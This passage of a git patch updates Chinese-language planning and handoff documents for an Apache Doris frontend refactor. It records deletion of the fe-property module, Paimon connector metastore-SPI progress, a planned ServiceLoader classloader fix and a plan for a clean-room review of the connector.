P1-5(物理删除的「后续任务」即此)。**⚠️ 超 D-005 原范围,已获用户专门授权(D-016)。** - -**P2-T04(paimon pom + gate 核对)— P1-T07 之后**: +**P2-T04(paimon pom + gate 核对)— 下一步**: - **做什么**:核 `fe-connector-paimon/pom.xml` 依赖集 = `fe-connector-{api,spi}` + `fe-connector-metastore-spi`(transitively 带 metastore-api + fe-kerberos)+ `fe-filesystem-api` + `fe-thrift(provided)` + paimon SDK + hadoop/aws/…;`tools/check-connector-imports.sh` PASS(P2-T03 已验 exit 0,复核即可)。 - **⚠️ P2-T03 recon 揪出的真正 substance(不只是 packaging 复核——可能要 1 行改 metastore-spi,白名单内)**:`MetaStoreProviders.load()` 用 **1-arg `ServiceLoader.load(MetaStoreProvider.class)`(TCCL-based)**;static `PROVIDERS` 在首次 `bind()`(= `validateProperties` 在 CREATE CATALOG)初始化,而该路径**不 pin TCCL 到插件 loader**(仅 `createCatalogFromContext` pin)。metastore-spi 在插件 zip **child-first lib/**(assembly 已确认 bundle、不在 excludes),**不在 fe-core classpath**。若 class-init 时 TCCL≠插件 loader → ServiceLoader 找不到 child-first 的 `META-INF/services` → **0 provider → `bind` 抛「No MetaStoreProvider supports」→ 所有 paimon CREATE/读 挂**。UT(单 flat loader)结构上抓不到。**建议 fix**:改 **2-arg `ServiceLoader.load(MetaStoreProvider.class, MetaStoreProviders.class.getClassLoader())`**(用模块自身 loader 发现,与 TCCL 无关;对标 `FileSystemPluginManager:99` 对插件 provider 用显式 loader)。执行前先读 fe-core 插件调用路确认 TCCL 是否被 pin,但 2-arg 形式无论如何更稳。 - **依赖**:P1-T07, P2-T03 ✅。设计 §4 P2-4。 @@ -89,6 +86,7 @@ - **可动**(白名单):`fe-connector-metastore-api/**` + **`fe-connector-metastore-spi/**`(新建)** + `fe-kerberos/**`(新建叶子)、`fe-connector-paimon/**`、`fe-connector-spi/**`、fe-core **仅** `connector/DefaultConnectorContext.java` + `fs/FileSystemPluginManager.java` + `fs/FileSystemFactory.java`(均**仅新增方法 / 对本项目所加方法的微改+注释**)、**`fe-filesystem/fe-filesystem-hdfs/**`(D-010,FU-T01)**、**`fe-filesystem/fe-filesystem-{s3,oss,cos,obs}/**`(D-011,FU-T02/FU-T03;main+test)**、相关 pom(`fe-connector/pom.xml`/`fe/pom.xml` 仅新增模块声明)、本跟踪目录。 - **P2-T02 额外触碰**(透明,白名单内):`fe-connector-metastore-api` 的 `MetaStoreProperties.java`/`JdbcMetaStoreProperties.java` 各 1 处 javadoc 诚实订正(`needsStorage` FS 准确性 + `getDriverUrl` raw 语义)——非改契约方法签名。 - **P2-T03 触碰**(透明,白名单内):`fe-connector-paimon/**` 5 main(`PaimonConnectorProvider`/`PaimonConnector`/`PaimonCatalogFactory`/`PaimonConnectorProperties`/`PaimonScanPlanProvider`)+ 2 test + `fe-connector-paimon/pom.xml`(加 `fe-connector-metastore-spi` 依赖,属 `fe-connector-paimon/**`)。**fe-core 旧 `Paimon*MetaStoreProperties` 不动;metastore-spi/api 未改**(只新增消费方)。 +- **P1-T07 触碰**(透明,白名单内):删除 `fe/fe-property/**`(D-016 授权)+ `fe/pom.xml`(删 `` + dependencyManagement 条目)+ 5 处 stale 注释「fe-property」→「legacy」(paimon `PaimonCatalogFactory`/`PaimonConnector`/`PaimonCatalogFactoryTest` + fe-filesystem-hdfs `HdfsConfigFileLoader`/`HdfsFileSystemProperties`,保历史语义非改逻辑)。**fe-core `datasource.property.{storage,metastore}` 两包不碰。** - **禁碰**:fe-core `datasource.property.{storage,metastore}` 包、构造点 `PluginDrivenExternalCatalog`、其它连接器(hive/hudi/iceberg/es/jdbc/mc/trino)、**其它 fe-filesystem 模块**(`-{api,spi,azure,broker,local}`,含其 test——R-008 若须给 api/spi 加共享 credentials-provider-type 须先 AskUserQuestion)、`fe-property` 模块删除。 - **FU-T01 额外触碰**(已记 D-010 + tasks,透明):fe-core `FileSystemFactory.java`(F1 +1 行 setProperty,项目 P1-T02 加的方法)、`FileSystemPluginManager.java`(bindAll javadoc,项目 P0-T02 加的方法)、fe-connector-paimon `PaimonScanPlanProvider.java`(注释)——均 project-owned 微改/注释,非碰 pre-existing fe-core 方法。 - paimon 连接器 + fe-filesystem-hdfs **允许** import `org.apache.doris.foundation.*`(fe-foundation 叶子)、`org.apache.doris.filesystem.*`;**禁** import fe-core/fe-connector(fe-filesystem 侧 gate)。 diff --git a/plan-doc/metastore-storage-refactor/PROGRESS.md b/plan-doc/metastore-storage-refactor/PROGRESS.md index 9dacb6e162ff15..b746252c41fed6 100644 --- a/plan-doc/metastore-storage-refactor/PROGRESS.md +++ b/plan-doc/metastore-storage-refactor/PROGRESS.md @@ -10,14 +10,15 @@ |---|---|---| | Research(调研) | ██████████ 100% | ✅ 完成(8-agent + grep;+ 3-agent recon 复核 D-006/7/8) | | Design(设计) | ██████████ 100% | ✅ 完成(设计文档 + **7 决策** D-001..D-008,范围已收窄) | -| **Implement(实现)** | █████████░ ~72% | 🚧 **进行中**(P0 ✅;P1 5/6 P1-T06 推迟[D-012];**P2 3/5 = P2-T01+P2-T02+P2-T03 ✅**;P3a facts 切片 ✅) | +| **Implement(实现)** | █████████░ ~75% | 🚧 **进行中**(P0 ✅;P1 6/7 = **P1-T07 ✅** + P1-T06 推迟[D-012];**P2 3/5 = P2-T01+P2-T02+P2-T03 ✅**;P3a facts 切片 ✅) | -任务计数:**11 / 15** 完成(P0: 2/2 ✅ | P1: 5/7,**P1-T06 推迟** + **P1-T07 新增** | **P2: 3/5(P2-T01 + P2-T02 + P2-T03 ✅)** | P3a: facts 切片 ✅ 机制待续)| + FU-T01/02/03 ✅、P3b 占位。**下一步 = P1-T07**(彻底删除 fe-property 孤儿模块,用户 2026-06-18 定为下一阶段、D-016 授权超 D-005),然后 **P2-T04**(pom+gate,⚠️ MetaStoreProviders ServiceLoader 改 2-arg 显式 loader)→ **P2-T05** docker 真闸。 +任务计数:**12 / 15** 完成(P0: 2/2 ✅ | P1: 6/7,**P1-T07 ✅** + **P1-T06 推迟** | **P2: 3/5(P2-T01 + P2-T02 + P2-T03 ✅)** | P3a: facts 切片 ✅ 机制待续)| + FU-T01/02/03 ✅、P3b 占位。**下一步 = P2-T04**(pom+gate,⚠️ MetaStoreProviders ServiceLoader 改 2-arg 显式 loader)→ **P2-T05** docker 真闸。 --- ## 当前活跃 task -- **下一步 = P1-T07(彻底删除 fe-property 孤儿模块)**(2026-06-18 用户定为下一阶段,**D-016** 授权——超 D-005「不删 fe-property」条款;fe-core 两包仍禁碰)。P1-T05 断边后 fe-property 已 0 消费者;whole-repo recon 证仅 `fe/pom.xml`(module+depMgmt)+ 5 处 stale 注释引用、0 import、无 BE/docker/脚本引用→删除限 `fe/`。做法=删目录 + fe/pom.xml 两声明 + 可选清注释;RED/GREEN=构建闸(全 FE 编译 + paimon 278/0/1skip 仍绿)。WORKFLOW §4.1 白名单已更新(fe-property 移入允许删除区)。**之后** P2-T04(pom+gate,⚠️ `MetaStoreProviders.load()` 改 2-arg `ServiceLoader.load(…, MetaStoreProviders.class.getClassLoader())` 防 child-first loader 下 TCCL 发现不到 provider)→ P2-T05 docker 真闸。 +- **P1-T07 ✅ 完成(2026-06-18,commit 待提交,D-016)**:彻底删除 fe-property 孤儿模块(超 D-005「不删 fe-property」条款;fe-core `datasource.property.{storage,metastore}` 两包仍禁碰、仍服务 hive/hudi/iceberg)。删 `fe/fe-property/`(27 文件 + stale `target/`→目录全消)+ `fe/pom.xml` 两声明(`` + dependencyManagement 条目)+ 清 5 处 stale 注释(一并清理,用户 AskUserQuestion 选;paimon×3 + hdfs×2,「fe-property」→「legacy」保历史语义)。**RED/GREEN=构建闸**:whole-repo `grep fe-property`(排 plan-doc)/`grep org.apache.doris.property` 双归零;**全 FE reactor `test-compile` BUILD SUCCESS**(`-Dmaven.build.cache.enabled=false`,fe-core `compile`+`testCompile` 实跑,54 模块 0 ERROR)+ paimon 全模块 **278/0/1skip** + fe-filesystem-hdfs **78/0/0** + checkstyle 0 + import-gate exit 0 + 白名单干净。⚠️ docker e2e 未跑(D-012)。 +- **下一步 = P2-T04(paimon pom + gate 核对)**:核 `fe-connector-paimon/pom.xml` 依赖集;`tools/check-connector-imports.sh` PASS(P2-T03 已 exit 0,复核即可)。**⚠️ P2-T03 recon 揪出的真 substance(可能 1 行改 metastore-spi,白名单内)**:`MetaStoreProviders.load()` 用 1-arg `ServiceLoader.load(MetaStoreProvider.class)`(TCCL-based),static PROVIDERS 在首次 `bind()`(CREATE CATALOG 的 `validateProperties`)初始化,而该路径**不 pin TCCL 到插件 loader**(仅 `createCatalogFromContext` pin)→子优先插件 zip 下若 TCCL≠插件 loader→0 provider→所有 paimon CREATE/读挂(UT 单 flat loader 抓不到)。**建议改 2-arg `ServiceLoader.load(MetaStoreProvider.class, MetaStoreProviders.class.getClassLoader())`**(对标 `FileSystemPluginManager:99`)。然后 **P2-T05** docker 真闸。 - **P2-T03 ✅ 完成(2026-06-18,commit `3c1e118dcfa`)**:paimon adapter cutover 到共享 metastore-spi(详见最近动态)。 - **FU-T02 ✅ + FU-T03 ✅ 完成(2026-06-18,D-011 授权)**:P1-T06 前的两项 fe-filesystem 对象存储补齐均完成(**R-008 + R-006 闭环**)。 - **FU-T02(R-008,commit `e5b088b14e7`)**:`Oss/Cos/ObsFileSystemProperties.toBackendKv()` 内联镜像 legacy `AbstractS3CompatibleProperties.getAwsCredentialsProviderTypeForBackend()`——ak/sk 皆空→`AWS_CREDENTIALS_PROVIDER_TYPE=ANONYMOUS`、否则省略。**DV-005**:不加字段/枚举(legacy OSS/COS/OBS 本无可配置 provider type,且 `S3CredentialsProviderType` 在 s3 模块、oss/cos/obs 不依赖)。TDD RED(`expected but was `)→GREEN;OSS 13/0·COS 12/0·OBS 12/0 + 全模块绿、checkstyle 0。 @@ -42,6 +43,7 @@ --- ## 最近动态(最近 7 天) +- 2026-06-18 **P1-T07 ✅(彻底删除 fe-property 孤儿模块,commit 待提交,D-016)**:执行 session 先按强制流程复核(读 PROGRESS/HANDOFF/WORKFLOW/tasks/decisions + 对照真实代码 recon)+ 1 边界经 AskUserQuestion 定(5 处 stale 注释「一并清理」)。**改动**(白名单内):`git rm -r fe/fe-property/`(27 文件 = 26 java + pom)+ `rm` stale `target/`(目录全消)+ `fe/pom.xml` 删 `fe-property` + dependencyManagement 条目 + 5 处注释「fe-property」→「legacy」(paimon `PaimonCatalogFactory`×2/`PaimonConnector`×2/`PaimonCatalogFactoryTest`×1 + fe-filesystem-hdfs `HdfsConfigFileLoader`/`HdfsFileSystemProperties`,保历史语义非改逻辑)。**RED/GREEN=构建闸**(无 UT 可写,同 P1-T05):whole-repo `grep fe-property`(排 plan-doc)=0、`grep org.apache.doris.property`=0;**全 FE reactor `test-compile` BUILD SUCCESS**(`-Dmaven.build.cache.enabled=false`,fe-core `compile`+`testCompile` 实跑,54 模块 **0 ERROR**,1:53min)=证 module+dependencyManagement 删除无隐藏 transitive 消费者;paimon 全模块 **278/0/1skip**、fe-filesystem-hdfs **78/0/0**、checkstyle 0、`tools/check-connector-imports.sh` exit 0、`git diff --name-only` 白名单干净。**fe-property 物理删除完成(0 消费者孤儿移除);fe-core 两包不碰。** ⚠️ docker e2e 未跑(D-012,留 P2-T05)。**下一步 P2-T04**。 - 2026-06-18 **D-016 + P1-T07 新增(用户定下一阶段=彻底删除 fe-property)**:用户授权物理删除已 0 消费者的 fe-property 孤儿模块,**超 D-005「不删 fe-property」条款**(fe-core `datasource.property.{storage,metastore}` 两包不变,仍服务 hive/hudi/iceberg)。whole-repo recon:仅 `fe/pom.xml`(module+depMgmt 真引用)+ 5 处 stale 注释、`org.apache.doris.property` import=0、无 BE/docker/脚本/regression 引用→删除限 `fe/`。新增 **P1-T07**(删目录+fe/pom.xml 两声明+可选清注释,RED/GREEN=构建闸),WORKFLOW §4.1 白名单把 `fe/fe-property/**` 移入允许删除区,HANDOFF「下一步」改为 P1-T07(先于 P2-T04/T05)。**仅文档更新,未删代码**(执行留下一 session)。 - 2026-06-18 **P2-T03 ✅(paimon adapter cutover 到共享 metastore-spi,commit `3c1e118dcfa`)**:直接读真实代码全路 + 对抗 recon `wf_9437dd4e-06d`(6 reader+synth+verify=SOUND/READY,逐键 parity 通过)→ 2 边界经 AskUserQuestion 定:**D-014**(采用 spi legacy-faithful validate——CREATE CATALOG 比当前 paimon 更严:HMS forbidIf(simple)/requireIf(kerberos)、REST case-sensitive `"dlf".equals`、DLF 在 CREATE 要求 OSS;故意向 legacy 收敛)、**D-015**(JDBC 注册副作用留连接器,仅纯 `resolveDriverUrl` 共享,Rule 2 不投机)。**改 5 main+2 test+pom**(白名单内,净 +318/−847):`validateProperties`→`MetaStoreProviders.bind(props,{}).validate()`;`createCatalog` HMS/DLF→`bind`+新薄 `PaimonCatalogFactory.assembleHiveConf(base,overrides)`(HMS seed `loadHiveConfResources` base 再叠 `toHiveConfOverrides`,DLF `assembleHiveConf(null,toDlfCatalogConf())`)、删 build-time `requireOssStorageForDlf`;两处 driver-url→`JdbcDriverSupport.resolveDriverUrl`;`PaimonCatalogFactory` 删 6 法+`KNOWN_FLAVORS`+加 `assembleHiveConf`;`PaimonConnectorProperties` 删 `DLF_*`/`REST_TOKEN_PROVIDER`/`REST_DLF_*`(**DV-008**:别名数组只**部分**删,`HMS_URI`/`REST_URI`/`JDBC_*` 仍被 `buildCatalogOptions` 用故保留;`bind` 取代设计早期 `*MetastoreBackend.parse`;`assembleHiveConf` 为离线测 F2 而抽)。**TDD**:新 `PaimonConnectorValidatePropertiesTest` 13/0(3 tightening RED→GREEN 实证)+ 删 28 旧 builder/validate 测(content parity 已由 spi `Hms/DlfMetaStorePropertiesTest` 13+7 覆盖)+ 2 `assembleHiveConf` 测。**验证 paimon 全模块 278/0/1skip**、checkstyle 0、import-gate exit 0、白名单干净。**对抗 review `wf_dd78ec4b-da5`**(4 lens+verify=READY,0 真 finding;唯一 MAJOR「kerberos.principal alias 未测」证伪=该键走 verbatim passthrough→测它恒真 tautology 违 Rule 9,隔离 binding 的 `service.principal`→`kerberos.principal` 方向已被 spi line72/80 覆盖)。⚠️ **docker e2e 未跑**(HMS/DLF live metastore=hive + plugin-zip ServiceLoader 发现 5 provider 在子优先 loader=P2-T04/T05 真闸)。**下一步 P2-T04**。 - 2026-06-18 **P2-T02 ✅(新建 fe-connector-metastore-spi,commit `7ea63528bc4`)**:recon workflow `wf_187e052d-230`(4 reader+synth,证两 deviation)+ 直接核实 → 3 边界经 AskUserQuestion 定(**DV-006** fe-kerberos compile-dep-only 零新代码、**DV-007** storage 中立 Map 模块 hadoop/fs-free、全 5 后端一次 commit)。建 22 文件:`MetaStoreProvider` SPI + `MetaStoreProviders` first-hit ServiceLoader 派发 + `MetaStoreParseUtils` + `JdbcDriverSupport.resolveDriverUrl`(纯 resolver;注册留 P2-T03)+ `AbstractMetaStoreProperties` + 5 `*Impl`(`@ConnectorProperty`,消灭手抄别名)+ 5 provider(`sensitivePropertyKeys` 暴露 sensitive 键)+ 单 services 文件。来源=上移 paimon `PaimonCatalogFactory` 手抄逻辑去 fe-core 化(HiveConf→中立 Map、authenticator→`KerberosAuthSpec` facts)。**HMS D-4 补回** forbidIf-simple/requireIf-kerberos(CASE-SENSITIVE `Objects.equals` 对齐 ParamRules,保留与 conf-build `equalsIgnoreCase` 的不对称)。验证 spi **41/0**、checkstyle 0、import-gate 0、**3 mutation 证**(RED→GREEN)。**对抗 review `wf_2ddae04d-cf9`(4 lens+verify)**:0 BLOCKER;1 真 MAJOR=**REST token-provider `equalsIgnoreCase`→`"dlf".equals`**(paimon 手抄 latent bug,legacy ParamRules 权威)已修;FS `supports()` 去 trim 不对称 + 对齐 legacy;DV-006/007/D-006/D-4 独立核实正确;trim/accessPublic-proxyMode 经核证对齐权威 legacy contract(不改);补 12 测覆盖缺口。**API 旁改 2 javadoc**(诚实订正,白名单内)。**下一步 P2-T03**(必接 hive.conf.resources base + kerberos() doAs 契约 + driver 注册下移)。⚠️ docker 未跑(T2 真闸 P2-T05)。 diff --git a/plan-doc/metastore-storage-refactor/tasks.md b/plan-doc/metastore-storage-refactor/tasks.md index e832d4551b77b3..8ebf1f8442fd42 100644 --- a/plan-doc/metastore-storage-refactor/tasks.md +++ b/plan-doc/metastore-storage-refactor/tasks.md @@ -77,12 +77,13 @@ - **验收**:见 WORKFLOW §5;若不跑 docker 明确标注"未跑 e2e"。 - **依赖**:P1-T02..T05。设计 §4 P1-6 / §5 T1,T4。**(推迟,docker 折入 P2-T05;D-012)** -### P1-T07 ⬜ 彻底删除 fe-property 孤儿模块(**下一阶段**;D-016 授权,超 D-005) +### P1-T07 ✅ 彻底删除 fe-property 孤儿模块(2026-06-18 完成,commit 待提交;D-016 授权,超 D-005) > **用户 2026-06-18 定为下一阶段,先于 P2-T04/T05。** P1-T05 断边后 fe-property 已 0 消费者;本任务物理删除它。 - **做什么**:① 删 `fe/fe-property/` 整个目录(26 java,package `org.apache.doris.property`);② 删 `fe/pom.xml` 的 `fe-property`(:222)+ dependencyManagement 里 fe-property 条目(:831);③ **可选** 清理 5 处 stale 注释(删模块后悬空):`fe-filesystem-hdfs` 的 `HdfsFileSystemProperties`/`HdfsConfigFileLoader`(「移植源 = fe-property…」)+ paimon 的 `PaimonCatalogFactory`/`PaimonConnector`/`PaimonCatalogFactoryTest`(「replaces/ported from legacy fe-property…」)——均白名单内文件,注释订正非改逻辑。 - **现场 recon(2026-06-18 已做,执行 session 须复核)**:whole-repo `grep -rln fe-property`(排除 .git/fe-property/plan-doc/target)= 仅 `fe/pom.xml`(真)+ 上述 5 文件(注释);`grep org.apache.doris.property`(排除 fe-property dir)= **0 import**;**无 BE/docker/脚本/regression-conf 引用**。删除内容**限于 fe/**。**fe-core `datasource.property.{storage,metastore}` 两包不碰**(仍服务 hive/hudi/iceberg,D-016 明确只删 fe-property)。 - **TDD/验收**:**RED/GREEN = 构建闸**(无 UT 可写,同 P1-T05 模式):删后**全 FE 构建**(`mvn -f fe/pom.xml … package`,至少 `-pl fe-connector/fe-connector-paimon -am` + 一次全 reactor 编译)+ **paimon 全模块 UT 仍绿(278/0/1skip)= 证无隐藏 transitive 断裂**;`grep -rn fe-property fe/`(排除 plan-doc)只剩(若保留注释则)注释或全清;checkstyle 0;import-gate PASS;`git status` 确认 `fe/fe-property/` 已删 + `fe/pom.xml` 两处声明已删。 - **依赖**:P1-T05(断边)。D-016。**⚠️ 超 D-005 原范围,已获用户专门授权。** +- **完成态(2026-06-18,commit 待提交)**:删 `fe/fe-property/`(27 文件 = 26 java + pom;stale `target/` 一并清→目录全消)+ `fe/pom.xml` 两处声明(`fe-property` + dependencyManagement 条目)+ 清 5 处 stale 注释(paimon `PaimonCatalogFactory`×2/`PaimonConnector`×2/`PaimonCatalogFactoryTest`×1 + fe-filesystem-hdfs `HdfsConfigFileLoader`/`HdfsFileSystemProperties`:「fe-property」→「legacy」保历史语义;用户 AskUserQuestion 选「一并清理」)。**RED/GREEN=构建闸**(无 UT 可写,同 P1-T05 模式):whole-repo `grep fe-property`(排除 plan-doc)=**0**、`grep org.apache.doris.property`=**0**;**全 FE reactor `test-compile` BUILD SUCCESS**(`-Dmaven.build.cache.enabled=false`,含 fe-core `compile`+`testCompile` 实跑,54 模块,**0 ERROR**,1:53min)=证 module+dependencyManagement 删除无隐藏 transitive 消费者;paimon 全模块 **278/0/1skip**、fe-filesystem-hdfs **78/0/0**、checkstyle 0、`tools/check-connector-imports.sh` exit 0、`git diff --name-only` 白名单干净(仅 fe-property 删除 + fe/pom.xml + 5 注释文件 + 本跟踪目录)。**fe-property 物理删除完成(0 消费者孤儿被移除);fe-core `datasource.property.{storage,metastore}` 两包不碰(仍服务 hive/hudi/iceberg,D-016 明确)。** ⚠️ **docker e2e 未跑**(D-012,留 P2-T05)。 --- @@ -171,3 +172,4 @@ - 2026-06-17:创建任务清单(P0×2 / P1×6 / P2×5),状态全 ⬜,待用户批准后开始 P1。 - 2026-06-17:3 设计点定稿(D-006 provider 取代 MetaStoreType 枚举 / D-007 fe-kerberos 叶子 / D-008 vended 边界);P2-T01/T02 改写(去枚举、加 MetaStoreProvider);新增 P3a/P3b(Kerberos)。 - 2026-06-17:用户确认 **P3a 纳入本次** + 模块名 **`fe-kerberos`**。核心任务计数 13 → **14**(+P3a-T01);P3b 仍 follow-up(范围外占位)。 +- 2026-06-18:**P1-T07 ✅**(彻底删除 fe-property 孤儿模块,D-016):删目录(27 文件)+ fe/pom.xml 两声明 + 清 5 处 stale 注释(一并清理,用户选);全 FE reactor test-compile BUILD SUCCESS(fe-core 实编译,0 ERROR)+ paimon 278/0/1skip + hdfs 78/0/0 + grep fe-property 归零。任务计数 11→**12/15**。下一步 P2-T04(pom+gate,⚠️ MetaStoreProviders ServiceLoader 改 2-arg)。 From 46e37eacbb16ef5163b45b74357116fa42063fe3 Mon Sep 17 00:00:00 2001 From: morningman Date: Thu, 18 Jun 2026 21:30:54 +0800 Subject: [PATCH 098/128] docs(catalog-spi): next session = paimon full-path clean-room review (no priors); main HANDOFF back to main line MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit - plan-doc/HANDOFF.md (main line) rewritten: next-session task = full paimon connector clean-room adversarial review across 6 paths (read/write/ddl/ metadata-replay/metadata-cache/legacy-fallback), comparing vs legacy, judging design + implementation delivery. - Highest-priority constraint: do NOT inject development-process priors (decisions/deviations/risks/past reviews/CI-RCA/catalog-spi-* memory) into review agents — clean-room, code-only, no Phase-C cross-check this round. - Review must precede B8 legacy deletion (legacy = comparison baseline); flagged cross-line tension (B8 scope vs fe-core classes still consumed by hive/hudi/iceberg, to be confirmed by review dim-6). - metastore-storage-refactor/ sub-dir: RV-T01 redirected to main line (HANDOFF/PROGRESS/tasks); sub-line own remaining work = P2-T04 -> P2-T05. - Recorded P1-T07 commit 13d3876d25d + two-branch push + PR #64445 run buildall. Co-Authored-By: Claude Opus 4.8 (1M context) --- plan-doc/HANDOFF.md | 167 ++++++++++-------- .../metastore-storage-refactor/HANDOFF.md | 14 +- .../metastore-storage-refactor/PROGRESS.md | 10 +- plan-doc/metastore-storage-refactor/tasks.md | 11 +- 4 files changed, 114 insertions(+), 88 deletions(-) diff --git a/plan-doc/HANDOFF.md b/plan-doc/HANDOFF.md index 539cdbaa813a0d..4b8e6378783da7 100644 --- a/plan-doc/HANDOFF.md +++ b/plan-doc/HANDOFF.md @@ -1,100 +1,111 @@ # 🤝 Session Handoff -> 滚动文档:每次 session 结束**直接覆盖**(不保留历史;历史见 `git log plan-doc/HANDOFF.md`)。 -> 协作规范:[AGENT-PLAYBOOK.md](./AGENT-PLAYBOOK.md) +> 滚动文档:每次 session 结束**直接覆盖**(不保留历史;历史见 `git log plan-doc/HANDOFF.md`)。协作规范:[AGENT-PLAYBOOK.md](./AGENT-PLAYBOOK.md) +> **范围**:本文件 = catalog-spi **主线** handoff。metastore/storage 抽取是**独立子线**,单独跟踪在 +> [`metastore-storage-refactor/`](./metastore-storage-refactor/)(其 HANDOFF/PROGRESS/tasks/decisions 自洽,本文件不复述细节)。 --- -# 🎯 下一个 session 的任务 — **B8 legacy 删除 + round-3 follow-ups(先 AskUserQuestion 定 scope)** - -**第三轮 clean-room 对抗 review 转出的 4 个 user-approved fix 已全部完成并各自 commit** -([`task-list-P5-rereview3-fixes.md`](./task-list-P5-rereview3-fixes.md))。无剩余已批准 fix。 -下一步是清尾工作,**开工前先 `AskUserQuestion` 确认要做哪一项**(B8 删除是大动作): - -1. **B8 legacy 删除**(task-list Follow-ups + 第三轮报告 R-1…R-8):legacy `fe/fe-core/.../datasource/paimon/*` - + `datasource/property/storage/{OSS,COS,OBS,S3,Minio}Properties`、`property/metastore/HMSBaseProperties` 等是 - dead residue。**删除前提**:FIX-4 不再需要它们作 literal 复刻对照(现已 commit,对照完成 → 可删)。 - **删除须保 load-bearing dispatch ordering**(`ShowPartitionsCommand:478-480`,R-4)。逐子树删 + 每删一批跑 - fe-core 编译 + 连接器测 + 全量 regression-gated。 -2. **D-057 re-scope**(报告 §D.3):deferred 的 `TablePartitionValues:162` prune-path sentinel residue **不影响 - paimon**(MVCC override 绕过)。把 deferral re-scope 到 **非-MVCC** 插件连接器(maxcompute/es/jdbc); - base-class DATE-epoch + HIVE_DEFAULT 路(P11-1/P11-2)是那边的隐患,非 paimon。 -3. **accepted-deviation 用户签字**(task-list「NOT in this fix scope」§):~10 MINOR + ~12 NIT + C-1 - observability + uncheckedFallbacks(REFRESH cache invalidation / partitions-TVF auth / split-plan RPC 在 - `executeAuthenticated` 外 / `PluginDrivenExternalCatalog:140` 吞 authenticator-wiring 异常)。逐条让用户 - accept-as-deviation 或转 fix。 - -## ✅ 已完成(本 session)— **FIX-4 `FIX-FECONF-STORAGE-PARITY`(cluster P8-1..4·P9-2/3)— commit `f0210b51871`** -- **连接器 only**(`PaimonCatalogFactory`,无 fe-core/SPI/BE)。FE-side Hadoop `Configuration`/`HiveConf` 重建 - 补齐到 legacy full parity:4a OSS endpoint-from-region(移入共享 OSS 块,删 DLF-local 死块)+ S3A base; - 4b S3 path-style + 4 个 tuning 键(**per-backend 默认**:S3 `50/3000/1000` + `AWS_*` twins,OSS/COS/OBS - `100/10000/10000`);4c 新 COS/OBS 块(**endpoint-PATTERN 检测** `myqcloud.com`/`myhuaweicloud.com` OR - scheme 键;S3A base + **无条件** `fs.cosn.*`/`fs.obs.*`;OBS native-vs-s3a by classpath);**user-approved** - S3 endpoint-from-region;4d HMS username alias(`hadoop.username`,移到 storage overlay 之后避 passthrough - clobber);**4e folded-in pre-existing MAJOR**:kerberos 块移到 overlay 之后(kerberized-HMS + simple-HDFS - 否则被 clobber 成 `auth=simple`+`sasl=true` 坏 GSSAPI)。 -- **meta(本 session 亲证有效,下次照用)**:① **design red-team 在写码前**(`wf_a6385c61-669`,5 skeptic + - completeness critic)抓出三处会 ship-wrong 的 framing:tuning 默认非均一、COS/OBS 按 endpoint pattern 检测 - 非 scheme-key、`fs.cosn.*`/`fs.obs.*` 无条件发;② **impl verification 在写码后**(`wf_f90260cb-5e6`)逐键 diff - legacy(fidelity CLEAN)+ 揪出 4e pre-existing MAJOR;③ **测试钉真不变式**:username-priority + kerberos 两个 - 新测在旧 ordering 是 RED(抓出 raw `hadoop.*` passthrough clobber authoritative 设置)。 -- 验证:连接器 56/0/0 + 全模块绿;checkstyle 0;import-gate 干净。live-e2e CI-gated(注明 gated,未谎称跑过)。 - 设计/总结:`FIX-FECONF-STORAGE-PARITY-design.md` + `-summary.md`。 +# 🎯 下一个 session 的任务 — **paimon connector 全功能路径 clean-room 对抗 review**(先于 B8 legacy 删除) -## 🗺️ 代码脚手架 -- **Plugin connector**:`fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/` - (存储装配 `PaimonCatalogFactory.java`:`applyStorageConfig`→`applyCanonicalS3/Oss/Cos/ObsConfig` + - 共享 `applyS3aBaseConfig`;`buildHmsHiveConf`/`buildDlfHiveConf`;scan `PaimonScanPlanProvider.java`; - @incr `PaimonIncrementalScanParams.java`)。`-api`/`-backend-*` 模块在 git 内为空壳。 -- **fe-core 桥/SPI**:`fe/fe-core/.../connector/DefaultConnectorContext.java`、`.../datasource/PluginDriven*.java`; - SPI `fe/fe-connector/fe-connector-{api,spi}/`。 -- **Legacy 对照基准(B8 删除目标)**:`fe/fe-core/.../datasource/paimon/`、`.../datasource/property/storage/` - 下 `{OSS,COS,OBS,S3,Minio}Properties`、`.../property/metastore/HMSBaseProperties`。**FIX-4 已 commit → 对照 - 完成,B8 可删。** -- **BE 消费端**:`be/src/format/table/`(`paimon_cpp_reader.cpp`、`paimon_reader.cpp`、`partition_column_filler.h`)。 +整个 paimon connector cutover(P0–P5 + round-3 fixes + 元存储子线)已落地。**删除任何 legacy 之前**,先对**整条连接器**做一次完整的、不带历史先验的回归式复审:从**设计**与**实现交付**两层判断对错,并**逐一对照 legacy 找差异**(区分有意偏离 vs 漏移植/回归)。这是整体复审,不是某个增量 task 的局部 review。 + +**6 个 review 维度**(用户指定;每维度独立成一条对抗 review 线): +1. **读取**(scan / split planning → BE 下发的整条读路) +2. **写入**(INSERT / sink,若存在则审,无则明确记录"无写路径") +3. **DDL**(CREATE/DROP CATALOG·DB·TABLE、CTAS、属性校验) +4. **元数据回放(metadata replay)**(catalog/db/table 持久化 + FE 重启 / edit-log replay 重建 + GSON 序列化/反序列化注册) +5. **元数据 cache**(schema / partition / sys-table / MVCC snapshot 等的填充·命中·失效·刷新) +6. **残留旧逻辑 / fallback**:还有哪些路径**仍走旧逻辑**或在某条件下 **fallback 回旧逻辑**(仍引用 fe-core legacy 类 / legacy/compat/instanceof/兜底分支) + +**方法**:clean-room 多 agent 对抗 review(参 memory `clean-room-adversarial-review-pref`)。每维度:finder(独立读**当前** paimon 实现 + **legacy 参照**实现,自行下判断)→ adversarial verifier(逐条试图**证伪**)→ synth。建议 workflow 编排(find→verify pipeline,每维度一条线)。 + +**⚠️⚠️ 关键约束(用户 2026-06-18 明确,最高优先级):本轮不得注入开发过程已有的先验知识。** +不把 `decisions-log` / `deviations-log` / `risks` / 既往 review 报告(含 `reviews/P5-*`)/ 过往 CI-RCA / `~/.claude/.../memory/*`(`catalog-spi-*`)/ tasks-doc rationale 当作 review 的前提或预设答案喂给 review agents——这些会用「早已查过 / 已判定 OK / 已知非 bug」制造盲区、限制 review 的公正性与开放性。review agents 的输入**只有代码**(当前 paimon connector 实现 + legacy 参照实现 + 6 维度问题)。clean-room 靠 **fresh subagent + 编排者精选 prompt** 实现(reviewer 不继承主 session 上下文;尤其要挡住主 session **自动注入**的 `catalog-spi-*` auto-memory 正文——对 